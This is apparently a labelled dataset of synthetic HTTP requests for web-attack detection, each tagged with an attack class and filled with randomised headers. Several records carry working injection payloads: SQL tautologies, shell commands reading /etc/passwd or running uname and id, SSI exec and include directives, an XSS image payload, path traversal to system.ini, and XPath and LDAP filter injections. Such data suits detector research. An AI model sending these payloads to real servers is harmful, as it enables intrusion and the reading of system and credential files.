Accept-Language: tpR-O, eEehsvd-etti;q=0.3, isi-exM, htoq-hAi
ETag: "@Q2pOBJcB38UINBAlX"
Expect: 100-continue
If-Unmodified-Since: Sun, 04 Jan 04 10:04:32 CET
If-Match: *
If-Range: Fri, 12 Jun 09 11:36:48 GMT
Pragma: no-cache
Referer: /6sOrio/xtIoIR/rQtfco/elnzeag/o1s3o.conf
User-Agent: t5m7taei6
Via: 3.8 19.239.68.151
X-Serial-Number: 074180308
----: ---------------------

null

End - Id: 35064
Start - Id: 41715
class: SqlInjection
GET /6itw4hipqted3z/aOts4bbseodeF/80MFy30M8cQ--sZWKK/wF-wGpx3Cb7LmnD8H/7kSeEuV.izNC9/nI2RS.jsp?1it8ebire0dn=of8betweenumwbulink%3E75%27o&1selhtmse=n2_EnULgJmRv&uhotttes=91daiaEErtakik&tirEr4n1=74696632&S5VQ9UHfnwVC=%27++++%2F**%2F+++++OR+++%2F**%2F%27%27%3D+%27&aamemqo=8014584&haFenGyhNl=b0dymaoIm91&ecdaaidipgatf4L=02550&dt=esock_stream%3E&iisbaApgrar=830 HTTP/1.1
Host: 38.202.22.84:057
Connection: eose2nb
Accept: */*
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: r-eQT;q=0.2, 3e1iu7D-n;q=0.3, io-i, t-wos1qts;q=0.8
Cache-Control: no-store
Client-ip: 60.67.60.69
Cookie: StonatoiU=8160980;tlim=ecmdtes7;oEo4l0=ht;mwn=153531671;eoiaL8ca=ad95mQLzeDnF
Cookie2: $Version="446"
Date: Wed, 31 May 06 04:44:19 CET
ETag: W/"jExUKKMSBj7ISjAY"
Expect: 100-continue
From: daatsa@4adiaM.fr
If-Modified-Since: Thu, 25 Sep 08 17:48:18 CET
If-Unmodified-Since: Sat, 03 Nov 07 21:39:28 CET
If-Match: "VArnKGyVMh-Mg9v5UKR"
If-None-Match: "GXrGnNJe9dDO4fka"
If-Range: *
Max-Forwards: 64
MIME-Version: 9.0
Pragma: no-cache
Proxy-Authorization: Digest nc=B6e30dfE
Authorization: euni 4arbhzM=tnrh
Range: 864538-4,42725-309719
Referer: http://www.hoaqhnmt.com/oolfo/sgie/ncRLc/cutexoa/nlnueMe7.css
TE: trailers,chunked;q=0.8
Trailer: Via
User-Agent: ndtwinte (tN-k0J; 0N_csy)
UA-CPU: Sparc
UA-Disp: 1862,8220,8
UA-OS: Linux
UA-Color: color32
UA-Pixels: 431x0868
Via: FTP/1.7 www.hau2mc.tiff, 6.1 79.19.148.124, FTP/3.6 www.ioi9st.shtml
Transfer-Encoding: gzip
Upgrade: aah/4.0
Warning: 916 www.eheltm.css "rn5mT" 
X-Forwarded-For: 152.105.208.9
X-Serial-Number: 611965021882313
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41715
Start - Id: 43012
class: OsCommanding
PUT /alrn5ctntosee/er/e6p/ao9lm4JbLmq4OkkWMJI/ePnyx/e6gwlecpNj9z.exe? HTTP/1.0
Content-Length: 136
Content-Language: ehirt7at,sazdno,td
Content-Encoding: compress
Content-Location: http://www.bikso.gov/mKFt/um1eteTE/oopyhn/ccipgnmy.tar
Content-MD5: eHJCb0hoOXN0OW5pTnlrZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 27 Jan 04 05:25:56 UTC
Last-Modified: Sun, 15 Feb 04 21:42:28 CET
Host: 121.138.119.18
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: eoeeain-hie, s2ti-va8lu, ZC-i1idr6s, e-ee1;q=0.4, u-esSp6a;q=0.1
Cache-Control: no-transform
Client-ip: 236.0.182.54
Cookie: cBnP4AJ=sjgarGsauahhe;I3fVfEm=20;sce8ute=20;wiNTCSv6Omd=e0eaheleeeni7rf;7ureepnoa=y33X@;0befEr=3682
Cookie2: $Version="787"
Date: Fri, 18 Feb 05 07:27:13 CET
ETag: "v0-1@Rv2TACZbOUJTaV"
Expect: ltfreq
From: odyrata@nanebCh8fa.gov
If-Modified-Since: Wed, 13 Apr 05 06:46:23 CET
If-Unmodified-Since: Mon, 29 Aug 05 21:03:53 GMT
If-Match: "qGZo@jMcMeCGnSlW0Kx"
If-None-Match: "frk5DnZA8fKSSYM"
If-Range: "gI5FGGrGt_9N7wjZ"
Max-Forwards: 428
Pragma: no-cache
Proxy-Authorization: ydmr uAdph=8otfgj
Authorization: Digest realm
Referer: /o7elhxr/ssmddIse/1nyimso/iycY7/nthtn0so.dll
TE: chunked;q=0.9,trailers
Trailer: Pragma
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 7.8; ua-nn; rv:3.3.7) Gecko/66522109
UA-Color: color8
UA-Pixels: 2695x320
Via: 7Sot/5.1 229.232.46.222
Transfer-Encoding: deflate
Upgrade: ciE0iZ/4.0
Warning: 931 www.eamhn.png "aDRe6i" "Tue, 14 Aug 07 15:29:26 GMT"
X-Forwarded-For: 225.212.15.105
----: -------------
~~~~~: ~~~~~~~~~~~~~~

ma=cat    /etc/passwd|&ehlaoereth=2j8&am=ucalgpyhalib6r9div&iasordid9usimet=rnn6e 6l&rttjrhdanEsttac=73411456&nyahi9a7=Nefae&ea=rl

End - Id: 43012
Start - Id: 39747
class: SSI
GET /alndnerydrYea5/haGnleeuunl84ogloz/EttiHoihd/HklxhdorEu%uI3/93oafNhr/iTVH0032yy_ROTAVd/documentLV-ZuM0et/w2-Y/eoaenn/nzntlmcnpjsJUdcnjesy/fApprneot5hye7Aa.tiff?se6=umeeo42p&Iu-services7Xp=wwMS&tqwnaxdNzi=ndk0snyredaq&oa9SodU=+&3EdEdtt1awneie=sLRSoL3Ma&nsit=4112841&ac=5021663&EyOauAwetR=ticfd%3A&rmrTlim6asts=0435921&Ta74ndeAe=t-dincludefhtsock_stream&ntfetsagevaiH=%3C%21--%23include+++++virtual%3D%22%2Fvar%2Flog%2Fhttpd%2Faccess.log%22+++++--%3E&mnroA6e9vol=%2Bnoeii-neimm HTTP/1.0
Host: www.e4gRe.de
Connection: 8a2etaa
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: LOont7-clsile;q=0.4
Cache-Control: no-cache
Client-ip: 187.4.219.205
Cookie: t1a3hhu1nEata=ic;youmrnitt=hddzeez;mlezid=tm\;l3rrm5onsni0iE=eQy-pRHp.
Cookie2: $Version="7"
Date: Sun, 11 Feb 07 01:57:15 GMT
ETag: W/"kJbc9fupXLm3CC3oW."
Expect: td7ebjge
From: n4tbla@ol8e.st
If-Modified-Since: Thu, 26 Jul 07 16:27:46 CET
If-Unmodified-Since: Thu, 16 Oct 08 02:05:42 GMT
If-Match: "kmbtH3IHTltr-bJA5x1"
If-None-Match: *
If-Range: Mon, 03 Jul 06 13:28:37 CET
Max-Forwards: 0
MIME-Version: 3.3
Pragma: A='ri8ea'
Proxy-Authorization: Digest qop=auth-int
Authorization: nyks7 tHmRb8=vgc3
Range: -8768,74-87
Referer: /smnhro2/eegae.shtml
TE: deflate
Trailer: Date
User-Agent: Mozilla/0.4 (compatible; Konqueror/6.9; Win98; ayanoswcei; qijfewe)
UA-CPU: Sparc
UA-Disp: 1946,7252,32
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 930x2188
Via: FTP/7.9 218.128.171.42
Transfer-Encoding: gzip
Upgrade: 2to/5.7, h7i/2.7, ufnrto/8.8, fpto/1.4
Warning: 957 www.4Ggtd.jpg "toiUl7sojbevrsrhed" 
X-Forwarded-For: 177.241.180.13
X-Serial-Number: 43717297958345
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39747
Start - Id: 39916
class: SSI
POST /ecECHhvPKh.s3.asp? HTTP/1.1
Content-Length: 139
Content-Language: grM,ntben0ca
Content-Encoding: identity
Content-Location: http://w2U4h.fr/NoieqnEu/suec/wtdsi4r/trl4tu/idretmwr.php
Content-MD5: amhidHFObnRlbjRlZTNzcQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 18 Jan 08 15:13:36 UTC
Last-Modified: Thu, 05 Nov 09 11:57:16 GMT
Host: www.i7eEwdih.it:80
Connection: zeev
Accept: text/*;q=0.9, image/*
Accept-Charset: iso-8859-15, windows-1258;q=0.6, iso-8859-5, cp-950;q=0.0, x-mac-turkish;q=0.2
Accept-Encoding: *
Accept-Language: iDsha-om;q=0.0, holvN-alE;q=0.6
Cache-Control: no-store
Client-ip: 239.36.31.16
Cookie: a8r=hhqtr;l1-boot.iniohttpsKs26t=3242;XjR8dechoEM=ojhlmiunml;r19rp=iaufscript;saoxgo0rao=607180;knm=stalhvpRem7
Cookie2: $Version="86"
Date: Mon, 15 Jan 07 24:36:14 CET
ETag: W/"KujfBaJYEnNh-svZHP"
Expect: 100-continue
From: toeedr@urdtrb.be
If-Modified-Since: Sun, 16 Nov 08 24:46:35 UTC
If-Unmodified-Since: Sun, 05 Feb 06 04:13:50 UTC
If-Match: *
If-None-Match: "yEvVKlSQTUz1rYVA1Y"
If-Range: Mon, 26 Feb 07 11:32:01 GMT
Max-Forwards: 38
MIME-Version: 3.1
Pragma: no-cache
Proxy-Authorization: Digest response="dD0B7d539F14ACC6a145A7c016DF9930"
Authorization: Basic ZGhBaGFpYW46RXVzb0FvZmc=
Referer: /1on8Oe/1rih1th.tar.gz
TE: trailers
Trailer: Trailer
User-Agent: Mozilla/1.2 (Windows; U; Win 9x 3.1; ic-m5; rv:5.7.0) Gecko/84620933
UA-CPU: StrongARM
UA-OS: Win9x
UA-Color: color16
Via: 0.8 193.69.194.244
Transfer-Encoding: areae; hi6ivrg=otTAo5e
Upgrade: enw/1.2
Warning: 151 www.ttt8oAn.jpg "coIndbni" 
X-Forwarded-For: 54.46.237.13
X-Serial-Number: 2450299915461461
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

wnE7aRatms0o=<!--#exec cmd="/bin/ls   -l /home/msftPetaal/LpnjhOT"   -->&dptheihh=cfyhwnbeeho2l&nkmwoLaeAjh=ok9/f

End - Id: 39916
Start - Id: 42540
class: SqlInjection
GET /sq4AFfKVsf4O2p8DK_Nu/n51KgQ/wPj-FEf9/uH9dhl6x_XeERFH/gr/6L14window.openkRFsbinCvilM/cCcY6O6CHX4zG2ChZ/fErchqi7/muaP9.shtml?teghs26pyrbeoql=iErnSgif+aes4bl&5ei7=ce+int&jwYasfisJ=992&04cdtyscn=-oeZI&wsm=obnp%5Cc%3A%40e%5Dsinclude74aechoGa&bOi=%27+++++OR+%27aaee%27+%3D+++%27+++&osEk=+udsfqo&jcjefnatn=ikzGacesq+2%3AF&etabiec8ILe=ad&6Bidm6cho7e=oikhnh%3Al&oseit=5 HTTP/1.0
Host: www.thipebodu.org
Connection: close
Accept: application/zip;q=0.5, text/xml;q=0.3
Accept-Charset: euc-jp, x-mac-japanese, us-ascii
Accept-Encoding: 
Accept-Language: rlae-sRs, nmla2rs-hawpi3, mr-scNxUs64
Cache-Control: max-age=6227
Client-ip: 144.73.242.147
Cookie: byraabotszne=800954
Cookie2: $Version="1"
Date: Fri, 31 Oct 08 05:29:25 UTC
ETag: "R_27@H9wdTqDRe2"
Expect: oc967Rm
From: bs1as@pton6i0pc.org
If-Modified-Since: Tue, 11 Apr 06 05:07:46 UTC
If-Unmodified-Since: Tue, 21 Apr 09 01:33:47 CET
If-Match: "OdKa-wpU2-1m6YB"
If-None-Match: *
If-Range: Wed, 20 May 09 24:21:17 UTC
Max-Forwards: 5
MIME-Version: 3.7
Pragma: vncfeta=jgrxinin
Proxy-Authorization: NTLM b0ExbHI1Y3RnZjdpb0lhaWRwQXU1c2FsZG90dHNqdXRjcw==
Authorization: NTLM YWNjZ0FuRUd0aGVpb3djeWRlb3lnc3RBbGFlZHluczh1b3RidGx0bzNOSUU=
Range: 79786-446
Referer: /3m31/llnr7eal/rooe/ndgii.dll
TE: trailers,trailers,gzip
Trailer: Via
User-Agent: odYoGYn.o http://www.61nm.net
UA-CPU: x86
UA-Disp: 1092,0849,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 8264x986
Via: si2s/3.6 94.215.143.145:721
Transfer-Encoding: identity
Upgrade: e2torm/4.8, rnb/5.6, cpieM/3.1, alfi/8.5
Warning: 849 91.226.70.102 "etoAoir5nkn8rne6Oce" "Sun, 03 Dec 06 06:07:53 CET"
X-Forwarded-For: 10.31.99.179
X-Serial-Number: 1876106760
----: -----------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 42540
Start - Id: 43965
class: OsCommanding
GET /ssi/envout.bat?|dir%20..............1 HTTP/1.0
Host: 75.253.118.239:80
Connection: close
Accept: */*;q=0.0
Accept-Charset: x-mac-cyrillic, x-mac-chinesetrad;q=0.2, windows-1252;q=0.6, windows-1250, iso-8859-9
Accept-Encoding: 
Accept-Language: 4eusrso-an35o
Cache-Control: max-stale=77
Client-ip: 112.139.123.3
Cookie: eArsu=407;TA@rE=Sayeghniro8ge
Cookie2: $Version="45"
Date: Tue, 04 Apr 06 07:10:16 GMT
ETag: "d0_qiYUs1JJWIAlbJB6"
Expect: naaaaho=iektd;i12sv
From: axenii@lMdner.de
If-Modified-Since: Sat, 20 May 06 19:30:11 CET
If-Unmodified-Since: Fri, 20 Feb 04 04:23:12 UTC
If-Match: "-p2rLxjVRyesjAFX.Q"
If-None-Match: *
If-Range: Thu, 03 Jun 04 18:22:20 CET
Max-Forwards: 0
MIME-Version: 7.7
Pragma: no-cache
Proxy-Authorization: NTLM bmxnaGZjaGlvaHRyYm50MDZicmlncFptY3FUc25pbXp0c3J2YmhodHk=
Authorization: NTLM VHVNYWVyN3Rzbml0d2lzcnBybGFqZXZsdm8wbGdkaWM=
Range: 2873-08
Referer: http://www.shmra9.fr/swsew3jt/venil/raecV.mdb
TE: chunked,trailers
Trailer: Referer
User-Agent: Mozilla/6.3 (compatible; MSIE 6.2; Mac OS X; hUaoq6yEti; befteea0)
UA-CPU: 68000
UA-Disp: 7638,7203,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 2346x026
Via: 7.9 35.81.119.170
Transfer-Encoding: diar
Upgrade: pAn/5.4, eynSnm/6.6
Warning: 185 www.ayfae.tiff:7 "h2dyo3oifn2sa9H7" 
X-Forwarded-For: 67.28.144.149
X-Serial-Number: 221610848523557
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 43965
Start - Id: 43301
class: OsCommanding
GET /oactthtc1ngil.html?@7svupFFrKt=++++%3B++++echo++%3B+++w%3B++uname++-a+%3B+++id&rhIfshsjmpst=ad&et=-way4&djleedust=on&doea6aInp=7thsbex%25%5Bo&dhen907snd=izqo&K2CFlNgform=iss&w-kbC=cblqs5enu2praC2o&eoh=ivPKbD_X-KN&ozmht4eao=2so234&rl9gtsr=rdbAerl9s&et=htpassaonbgsoundiapassthrumh2tuu&6.E3ghVZ@cY=hjsd HTTP/1.1
Host: www.r8dldob8.uk
Connection: ti67
Accept: audio/basic
Accept-Charset: windows-1251
Accept-Encoding: deflate
Accept-Language: sFsia72a-eofe, aoDyad-plfwaTx;q=0.8, i-qtw;q=0.1
Cache-Control: max-age=6602
Client-ip: 102.61.9.190
Cookie: fdUei=0Tk0AmFe;.mZASPE5=ld5ztctacbaped
Cookie2: $Version="7"
Date: Sat, 04 Feb 06 05:26:08 CET
ETag: W/"pGAcH-IoVLLI.qP.7"
Expect: 100-continue
From: ehhmnsme@ohym.uk
If-Modified-Since: Fri, 21 Dec 07 05:06:04 GMT
If-Unmodified-Since: Thu, 18 Feb 10 04:58:46 UTC
If-Match: *
If-None-Match: "2NXTWfKgaX2XVyyL@5e"
If-Range: Mon, 19 Sep 05 05:23:10 UTC
Max-Forwards: 7
MIME-Version: 0.7
Pragma: no-cache
Proxy-Authorization: Basic cDlzYVNpc3Q6cEZOZnIx
Authorization: Digest response="e94e9e549009C6cefDEbd6920AD5aE3A"
Range: -340027,1338-0
Referer: /nin0em/tniroom/aaeUsuu3/5fortrAf.rar
TE: trailers,chunked;q=0.3
Trailer: Cache-Control
User-Agent: Mozilla/4.6 (X11; U; SunOS sun4u 0.8; Co-zt; rv:3.2.6) Gecko/45207330
UA-CPU: Sparc
UA-Disp: 260,218,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 3321x719
Via: evemx/1.6 142.180.216.74, HTTP/5.0 www.iv8air.gif, 1.2 www.hherTlg.htm
Transfer-Encoding: toqnb; du1Mu=orcef
Upgrade: svhC/6.6, eeeovf/0.6, Rs9jj/2.4, inuc/6.8
Warning: 597 167.142.104.140 "ureioenlrkas6ps" 
X-Forwarded-For: 31.255.144.84
X-Serial-Number: 33268910997830583
----: ---------------
~~~~~: ~~~~~~~~~~

null

End - Id: 43301
Start - Id: 48130
class: XSS
GET /scn/wPA@P-rtF/zBagwG/vwdoisTgeler7tsuez.htm?Ea=852717&tsEesiaoiu=%3Cimg+++++src+%3D+++%22++livescript%3A%5Balert%28%27ah8%27%29%3B%5D+++%22%3E&sQb6K8Vdf=yheEgSrees2j&oa5WeFiexigdtX=lOsi9eeran4rneetld&dhhron6ypoom=2134864574&gac=253&t0c=%5D7hl&rg=yoznoobjectfehm&tmo=248989&0oaaca1=rI0ntnia8wbody&ei=eog&rcaas0otl=oeJ2tuUmbO3 HTTP/1.0
Host: www.ryaYnnD.de:80
Connection: close
Accept: video/*;q=0.5, application/*
Accept-Charset: *
Accept-Encoding: identity, deflate;q=0.8, gzip, compress;q=0.0, gzip;q=0.4
Accept-Language: mlafur-neduwyez, oe9e-rgdd7oe, yu1alsr-lHeig, esoh-ayptd1nB
Cache-Control: min-fresh=38
Client-ip: 94.244.224.171
Cookie: phmeshbesrgaa=0awde/;eep=dtadbe5vel;atesd=ct
Cookie2: $Version="2"
Date: Thu, 04 Mar 10 13:21:36 CET
ETag: W/"RdKDdWmzVeSfgJG3"
Expect: hdZrwa
From: terhoe3@ygfzae.st
If-Modified-Since: Sat, 06 Nov 04 06:27:25 GMT
If-Unmodified-Since: Mon, 09 May 05 10:52:53 CET
If-Match: *
If-None-Match: "I5aF0Yt8Q5GmECYy_"
If-Range: "6urbSMHqz7xgjQ920lX"
Max-Forwards: 715
MIME-Version: 8.0
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: fNss o6se=C22aan
Range: 2-92,159872-,109519-
Referer: http://nf2Eps.biz/1arEws/Tdec1hje/i0rs9rh.exe
TE: deflate,trailers,trailers
Trailer: User-Agent
User-Agent: Mozilla/5.7 (compatible; d34t; Linux i586; nfdnue; leaxin2Rri)
UA-CPU: Sparc
UA-Disp: 121,8495,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 8071x836
Via: FTP/8.7 www.5ueaa.jpeg, HTTP/4.5 227.81.84.77
Transfer-Encoding: y0sEs
Upgrade: ahrnb/9.3, dedEnm/2.8, Knaee1/4.9, betzh/8.1, EaMe1a/1.8
Warning: 994 www.tlp8eHc.js "tnRTM0oe" "Fri, 07 Sep 07 09:29:11 CET"
X-Forwarded-For: 72.155.7.72
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48130
Start - Id: 35435
class: SqlInjection
GET /yqbEoyyhjaseA7re6oh/tXUUHr8/As8cOhtalstor2lieh/irlenot5rnwilsehtr/kpOet27qpil/neThtttha/e8BcuLMAyPHi/.taG-v.jpg?tsisrp2eas6ted6=eecnils&3z50wINl4=ncDi4o6frah2oa&SIVm=674231&e3neUxr=407&tirohe=%27++++or++id++++in+++++%28+++++select++++*++++from++user_db+++%29&ebe=5723&V7=5&_JyQ0F=ne+s HTTP/1.1
Host: www.par0e.de
Connection: sd6e
Accept: application/rtf
Accept-Charset: euc-kr
Accept-Encoding: *;q=0.1
Accept-Language: tyets-et;q=0.8, ESiE4-4, ymujnem-t;q=0.6
Cache-Control: ttintne='fiveiBs'
Client-ip: 211.249.233.8
Cookie: tdt0er8aor=Rupdate;rm3enm=4110;mt=lib=vtuAoirw~]eN;;pns=uLaialuvMWNY;EU5ymr=iffzDud2H;cuU=Ec
Cookie2: $Version="94"
Date: Sat, 01 Nov 08 13:59:40 GMT
ETag: W/"5rgyakrT9GajtwJuxJ"
If-Unmodified-Since: Mon, 12 Nov 07 19:28:33 UTC
If-Match: "FJvoLh-G0EVGOMA"
If-None-Match: "kQQhM7FyU5rzLUp49Y0I"
If-Range: "zlXUjkJtk8Wh5mK"
Max-Forwards: 42
Referer: /irfitaHx/thrsltri/soutBhae/jatdo/ocdAwayd.html
TE: trailers
Trailer: From
User-Agent: swsl6tiA (rmVPLhfuy; bWkj1tz; lOTP3u)
UA-OS: FreeBSD
Via: HTTP/6.6 66.160.77.210, 2.2 34.103.127.232, 7.5 195.110.249.122

null

End - Id: 35435
Start - Id: 35955
class: PathTransversal
GET /i4px43awYko5/dEXc1sHcx4Q/pn14/fTH4DDWq1.lG/aFDRFpVICc.png?ndenoerJ=185&ayp=9774379&up-petcIbody=itigFwsal HTTP/1.1
Host: www.0athhhneE.be
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: windows-1255;q=0.0, cp-932, windows-1254, euc-kr;q=0.2
Accept-Encoding: ..\..\..\..\WINDOWS\system.ini
Accept-Language: efeedg4o-oe9a4y, nqimpni-o4ast;q=0.6, sgl-l65h0ahl;q=0.5
Client-ip: 160.64.233.206
Cookie: adisHt=423331;ti=5eereetcfetyi;nitRymer=iUq6ONLJw0;cuvre6mawibto=wNiip91hnptwo
Date: Fri, 15 Dec 06 19:57:24 GMT
Expect: eeRs=ah4rd6Re;hHiat=hnO6t
If-Modified-Since: Mon, 02 Nov 09 13:02:09 GMT
If-Match: "h-@rY-5ac96kTzn"
Max-Forwards: 249
Referer: http://Eooc6Lr1.gov/heoeEn/enit/pCo2a.asp
TE: trailers
User-Agent: Mozilla/6.9 (Windows; U; WinNT 2.8; l4-af; rv:6.6.0) Gecko/76235166
Via: 8.8 www.OnsTjbbo.jpg:40, stt0ne/5.2 www.19ykoh.png, 8.3 www.ilhztb.css
Transfer-Encoding: identity

null

End - Id: 35955
Start - Id: 48341
class: XPathInjection
GET /qhnc.msf?2nmhms=39093906&Eei=31511&oeudg=y1ooye HTTP/1.0
Host: 13.193.69.180
Connection: oeeSssoh
Accept: */*;q=0.3
Accept-Charset: big5, iso-2022-jp, x-mac-hebrew;q=0.2
Accept-Encoding: 265   or tn/uegte/zoonh/child::node()[position()=2] or   66=
Accept-Language: *;q=0.0
Cache-Control: max-age=68
Cookie: XRumselh=sxeifmlqryos
Date: Sun, 02 Sep 07 18:45:06 CET
If-Modified-Since: Fri, 20 Feb 04 14:28:35 CET
If-Unmodified-Since: Sun, 25 Apr 04 09:24:14 GMT
If-None-Match: *
If-Range: *
Pragma: DSosti='sj0o'
Authorization: NTLM bG5iaGVkaHRuc3NoY2FDQnVmaUxkenJtd1Bvck5vZG50aXM=
Referer: /e9up/8ynXTh1i.dll
User-Agent: d8edFnnduatN
Via: 9.5 www.nnbmmnaz.gif, 2.8 www.ioebc.htm
Transfer-Encoding: identity
X-Serial-Number: 950594600737

null

End - Id: 48341
Start - Id: 38433
class: LdapInjection
GET /eiprqmna/u6YjlcVe5FekYpZd5./tvkjBnRy/i7uoa8eimicnieyT/zRD3wLwHx3@r/9hf/iN3AqinLCg4nboot.ini0j/-62.6bfBvarHGXcZ/obllEIngogtuyhelr.jpeg?uh3eiT=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&deeueeetom=sop&ttuihnhdwEe=777&aba2atrafp=cin&Jobject9pscvEUh=nooe&Tic=1&oqgirlffdht8nt=tsdah&formHBOaw=swp-zpn&riksn=dtmpsd%2Fnnsdcyc&dNEh=ryoa&aUeehlrbnsatass=uD%7E2neruq&asoID=9054589781&scetcfE8tcaeaad=+c HTTP/1.1
Host: www.iDvabkeeu.be
Connection: close
Accept: application/*;q=0.7
Accept-Charset: shift_jis;q=0.5, iso-8859-8-i;q=0.9
Accept-Encoding: 
Accept-Language: n-oaeTe;q=0.4
Cache-Control: max-age=24
Client-ip: 37.157.72.85
Cookie: miiu1ealeehl=rFrecrp;afi=cchildi77ili;nPolBhS=e9sAhr;Ireplace-WgxmlhttpF_=82068;iheos=ot ;GSdJnevalsc=nSal
Cookie2: $Version="91"
Date: Tue, 14 Apr 09 17:04:19 CET
ETag: W/"xtXrh_nP5gn7GdAL"
Expect: 100-continue
From: Le6sx3@8TUli.gov
If-Modified-Since: Thu, 07 Feb 08 07:53:51 GMT
If-Unmodified-Since: Thu, 10 Jul 08 13:09:39 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 3456
MIME-Version: 3.3
Pragma: no-cache
Proxy-Authorization: Digest cnonce="twseli3"
Authorization: Digest username="msweR"
Range: -03,38-
Referer: http://oiuxw.net/rhoiiair/asnan/tizl.dll
TE: gzip
Trailer: If-Range
User-Agent: Mozilla/2.8 (Windows; U; Win 9x 3.2; eo-at; rv:6.2.4) Gecko/19708308
UA-CPU: 68000
UA-Disp: 471,4327,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 9661x8120
Via: HTTP/5.6 www.nfyinLsr.png:5088, FTP/6.0 www.hnaeu7si.tiff, vhoat/7.0 www.gsod.jpg
Transfer-Encoding: identity
Upgrade: lig/4.2, roeri/4.4
Warning: 498 www.qbdd.css:76 "iEsitooO9Eeo" "Mon, 07 Mar 05 03:32:44 UTC"
X-Forwarded-For: 180.11.72.245
X-Serial-Number: 8565701730547644653
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38433
Start - Id: 39587
class: SSI
GET /Oa/3bh3@RJWmpC3iel/nasneObygsoceug/h9y_-mWHm.DiMsl3amx/ZshlinkH/systemNUformyyY-oD/4DSYzkKp@S7@/wjg3/uWEESPbRaE.gif?PK3insertB.vey=e4OkjLgQTL&nqlr=nb7&2fvhncuojnife=2355&osimccr=uhN5&lreeac4oygreoTe=0726&wsynktn8ueB5a8=eni5jr5esroecsKt&eAaEeos8rskbehB=2785610940&ru1et3eo8=141&aeesCr=5651&x@j%uJRW.aB=%3C%21--+++%23include+++virtual%3D%22%2Fvar%2Flog%2Fhttpd%2Faccess.log%22+++++--%3E&nes2Inthrdy4n=33393842&Hc6Hlqul=emt0mYnrti HTTP/1.1
Host: 141.255.161.85
Connection: close
Accept: video/quicktime;q=0.4, video/*, text/xml
Accept-Charset: iso-2022-jp;q=0.0, iso-8859-6;q=0.7
Accept-Encoding: gzip, compress;q=0.6, compress;q=0.4, gzip;q=0.4
Accept-Language: *
Cache-Control: max-stale=2
Client-ip: 241.190.56.140
Cookie: 0s8TLBtelnetX0d=0266040101
Cookie2: $Version="7"
Date: Tue, 15 Mar 05 23:32:40 UTC
ETag: "QQaFNHDxvsmJsy85@QP"
From: szEete@ence.uk
If-Modified-Since: Wed, 23 Sep 09 06:35:21 GMT
If-Unmodified-Since: Thu, 18 Jun 09 14:46:06 CET
If-Match: "5XMzdnpHET-d0AQRoG"
If-Range: *
Max-Forwards: 9
Pragma: eeh='eInew'
Authorization: Digest realm
Range: 5591-,251722-40474
Referer: http://otppP.st/u4meene/rbTegse.nsf
TE: trailers
Trailer: Accept-Language
User-Agent: Mozilla/4.2 (X11; U; Unix 7.5; i5-ee; rv:3.5.7) Gecko/98938469
UA-Disp: 779,442,32
UA-OS: Win98
Via: ltor/8.3 www.sbuSfoIf.jpg, 2.1 www.tisrQs.jpeg:2
Transfer-Encoding: eeLx
Upgrade: oshili/5.5, wen/5.9
Warning: 816 90.205.210.114 "n6wratgRHtneatUce" "Sun, 10 Jun 07 18:21:41 GMT"

null

End - Id: 39587
Start - Id: 38819
class: LdapInjection
GET /erxstamar6fnWreuht/up4e4Thedio/oTh3nmoo97araarNhio5/otoiFzI7yyb7mff./0isdliesuela/2jvHQznGp/dhiee5a1gcf4io/qmwhwinalatfcls.shtml?noiejyoef9ulen=39752&sythrnu9uai7=sy2jd3DdhJw&WAiframepn=%29%28+++%7C%28cn%3D*o+++%27brien*+++%29%28mail%3D*o++++%27brien*+++%29++ HTTP/1.1
Host: www.azRtBtc.net
Connection: close
Accept: audio/*;q=0.5
Accept-Charset: iso-8859-8-i, euc-kr, x-mac-korean
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: max-stale=19556
Client-ip: 166.96.232.49
Cookie: ouaeh=700;Evdeh=ew
Cookie2: $Version="4"
Date: Mon, 09 Jun 08 23:14:23 UTC
ETag: W/"h37vwYz1lL0OI8Y"
Expect: 100-continue
From: Emhleev@7nsic.de
If-Modified-Since: Fri, 21 Dec 07 14:56:18 GMT
If-Unmodified-Since: Sun, 08 Aug 04 09:39:35 GMT
If-Match: *
If-None-Match: "6yIrmTw1gqsS98sQA"
If-Range: Thu, 25 Jan 07 09:04:49 UTC
Max-Forwards: 536
MIME-Version: 3.3
Pragma: u=sait
Proxy-Authorization: NTLM RW1rbmlpc2hoaTFzOUlldHNFZmF4c25ob3RlNm9qbHNjcG43ZQ==
Authorization: Digest algorithm=MD5
Range: 635-4999,578-28594,-3
Referer: http://www.aTioq.cz/5rpaano/4tz0aae/5ICmeme.zip
TE: chunked,deflate;q=0.6
Trailer: Accept
User-Agent: lsM2s1mbxusoa5uoyan
UA-CPU: MIPS
UA-Disp: 0767,501,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 8161x590
Via: FTP/6.2 www.iAlood.png
Transfer-Encoding: tPiVt; ueAtt=isolelc
Upgrade: ctrbt/2.3, eLc/5.5, Tey/4.2, adeltf/5.1
Warning: 659 www.rhdhc.htm "uoftereRIuwgtWj" "Wed, 06 Aug 08 14:08:03 CET"
X-Forwarded-For: 199.212.3.152
